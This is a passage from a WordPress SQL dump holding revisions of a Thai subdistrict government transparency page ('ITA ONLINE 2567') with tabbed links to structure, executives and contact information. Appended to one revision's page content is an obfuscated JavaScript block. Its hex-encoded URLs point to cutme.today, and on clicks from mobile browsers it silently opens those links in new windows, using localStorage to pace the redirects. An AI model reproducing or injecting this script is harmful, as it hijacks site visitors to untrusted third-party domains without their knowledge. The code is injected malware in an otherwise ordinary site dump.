class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_a3f15d-d7\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"74e53c05\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"608409cd\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-608409cd gb-headline-text\"><strong>ข้อมูลพื้นฐาน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/iconlist {\"uniqueID\":\"871_db0f60-10\",\"icon\":\"fe_arrowRight\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_db0f60-10 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_f0fbcd-0d\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f0fbcd-0d\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_f19143-44\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_f19143-44\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_a70426-ef\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_a70426-ef\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-19 12:37:55','2024-08-19 05:37:55','',871,'http://pakhaeng.ssk.in.th/?p=881',0,'revision','',0),
(883,1,'2024-08-19 12:40:17','2024-08-19 05:40:17','<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"var(\\u002d\\u002dglobal-palette4, #2D3748)\",\"titleColorHover\":\"var(\\u002d\\u002dglobal-palette3, #1A202C)\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBgHover\":\"var(\\u002d\\u002dglobal-palette8, #F7FAFC)\",\"titleBgActive\":\"#0a6689\",\"titleBorder\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"size\":1.1,\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 